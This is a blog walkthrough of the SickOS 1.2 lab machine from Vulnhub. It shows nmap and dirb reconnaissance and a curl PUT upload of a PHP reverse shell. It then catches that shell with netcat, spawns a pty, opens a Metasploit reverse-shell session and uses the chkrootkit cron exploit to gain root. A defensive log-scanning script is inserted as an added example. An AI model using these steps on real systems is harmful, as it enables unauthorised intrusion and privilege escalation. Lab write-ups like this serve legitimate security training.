Vulnhub SickOS 1.2 Walkthrough | The Hackers Store




Hello Friend! I know I was inactive on this blog for a while, but now I'm planning to be active. Anyway, today I am going to show how I pwned the Vulnhub SickOS 1.2 machine and give you a walkthrough for the same.

Description of SickOs 1.2 on Vulnhub:
This is second in following series from SickOs 1.2 and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
Difficulty: beginner

Vulnhub SickOS 1.2 Walkthrough: Let's Get Started!!

First we need to find out the target machine's (SickOs 1.2) IP in order to gather information about it.
Here I simply used the nmap -sn option (host discovery) with my IP, scanned the whole subnet, and got the IP address of the machine running on VirtualBox, which is SickOs 1.2.
root@r00t3v1l:~# nmap -sn
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for
Host is up (0.0036s latency).
MAC Address: 98:2F:3C:DE:AD:05 (Sichuan Changhong Electric)
Nmap scan report for
Host is up (0.00038s latency).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.12s latency).
MAC Address: 34:E6:AD:A3:E3:23 (Intel Corporate)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.32 seconds
Now that we have the IP address, it's time for an nmap scan to detect open ports and the services running on them.

Here I have used nmap with:
  • -sV option to scan for service versions
  • -sC option to use common nmap NSE scripts
  • -p- or -p 0-65535 option to scan all the ports
root@r00t3v1l:~# nmap -sV -sC -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.59 seconds
So far we have found 2 ports open:
  • 22 SSH
  • 80 http
I opened the IP in the browser but found nothing useful.

So I ran dirb to look for potential hidden directories on the SickOs 1.2 vulnerable machine and found the /test/ directory.

root@r00t3v1l:~# dirb
DIRB v2.22   
By The Dark Raver
START_TIME: Wed Jun 20 23:25:34 2018
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612                                                         

---- Scanning URL: ----
+ (CODE:200|SIZE:163)                           
==> DIRECTORY:                                      
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)                                                                
END_TIME: Wed Jun 20 23:25:35 2018
I checked the /test/ directory and found that it is served by lighttpd 1.4.28. I quickly checked for available exploits but got nothing working.

Looking at the available HTTP methods on this /test/ directory using curl, I found that the PUT method is allowed, which we can use to upload files to this directory.

root@r00t3v1l:~# curl -vv -X OPTIONS
*   Trying
* Connected to ( port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host:
> User-Agent: curl/7.60.0
> Accept: */*
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Content-Length: 0
< Date: Wed, 20 Jun 2018 18:09:47 GMT
< Server: lighttpd/1.4.28
* Connection #0 to host left intact
I uploaded a PHP reverse shell to the /test/ directory with curl, using the PUT HTTP method vulnerability, and got a lovely message: "We are completely uploaded and fine".

root@r00t3v1l:~# curl -v --upload-file /root/shell.php -0
*   Trying
* Connected to ( port 80 (#0)
> PUT /test/r00t.php HTTP/1.0
> Host:
> User-Agent: curl/7.60.0
> Accept: */*
> Content-Length: 5494
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 20 Jun 2018 18:15:13 GMT
< Server: lighttpd/1.4.28
* Closing connection 0
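
From the defender's side, the upload above leaves a clear trail in the web server's access log: a PUT answered with 201, then a request for the same script path. The following is an added example, not part of the original post; it assumes the server writes common/combined-format access logs, and the log lines and the function name find_upload_alerts are constructed for illustration.

```python
import re

# Common/combined log format: host ident user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py", ".sh")

# Constructed sample log lines (documentation-range addresses, not from the post).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jun/2018:18:09:47 +0000] "OPTIONS /test/ HTTP/1.1" 200 0 "-" "curl/7.60.0"
192.0.2.10 - - [20/Jun/2018:18:15:13 +0000] "PUT /test/r00t.php HTTP/1.0" 201 0 "-" "curl/7.60.0"
192.0.2.10 - - [20/Jun/2018:18:16:02 +0000] "GET /test/r00t.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.55 - - [20/Jun/2018:18:20:00 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0 "-" "curl/7.60.0"
192.0.2.77 - - [20/Jun/2018:18:21:00 +0000] "PUT /upload/x.php HTTP/1.1" 403 345 "-" "curl/7.60.0"
this line is malformed and must be skipped
"""

def find_upload_alerts(log_text):
    """Flag successful PUT uploads; escalate a script upload that is later requested."""
    uploads = {}  # path -> alert dict, kept in order of first upload
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as access-log entries
        method, status = m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if method == "PUT" and status in (200, 201, 204):
            is_script = path.lower().endswith(SCRIPT_EXT)
            uploads[path] = {
                "path": path, "src": m["src"], "time": m["ts"],
                "script": is_script, "executed": False,
                "severity": "high" if is_script else "medium",
            }
        elif method in ("GET", "POST") and status < 400 and path in uploads:
            alert = uploads[path]
            if alert["script"]:
                # An uploaded script was requested afterwards: likely execution.
                alert["executed"] = True
                alert["severity"] = "critical"
    return list(uploads.values())

if __name__ == "__main__":
    for alert in find_upload_alerts(SAMPLE_LOG):
        print(alert["severity"], alert["src"], alert["path"], alert["time"])
```

Any hit on a directory that is not meant to accept uploads is a reason to disable write methods for that path on the server.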

Now simply set up a netcat (nc) listener and make an HTTP request to your uploaded reverse shell through your browser, and WOAH!!! You have a limited shell on the server.

One thing I noticed here is that the reverse shell is blocked on strange ports like 4444 or 1337, probably due to rules set in iptables. It worked when I used port 443 for the same purpose.

Well, this is a limited shell we have got; if you want, you can upgrade to a fully interactive TTY shell using:
python -c 'import pty; pty.spawn("/bin/bash")'
After enumerating the SickOs 1.2 Vulnhub machine for some time, I found that a vulnerable cron job named chkrootkit is running, for which a Metasploit exploit is available...


but for this we need a reverse shell session on metasploit so we will use
Unfortunately interpreter is not working here.

msf exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Command shell session 2 opened ( -> at 2018-06-21 00:28:34 +0530

Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 11:58:33 up 34 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ^Z
Background session 2? [y/N]  y
msf exploit(multi/handler) >
Background the session using CTRL+Z.
Now simply run the chkrootkit exploit, set your reverse shell session ID on it, and hit EXPLOIT!! :D

msf exploit(multi/handler) > use exploit/unix/local/chkrootkit
msf exploit(unix/local/chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION                           yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(unix/local/chkrootkit) > set SESSION 2
msf exploit(unix/local/chkrootkit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
Now we have to wait for chkrootkit to run. The thing here is that the chkrootkit cron job runs once a day, so you have to wait for it to run, and after that you will get a root shell.

So this was the Vulnhub SickOS 1.2 walkthrough; hope you enjoyed reading it. Please do leave your valuable comments below if it helped you :)


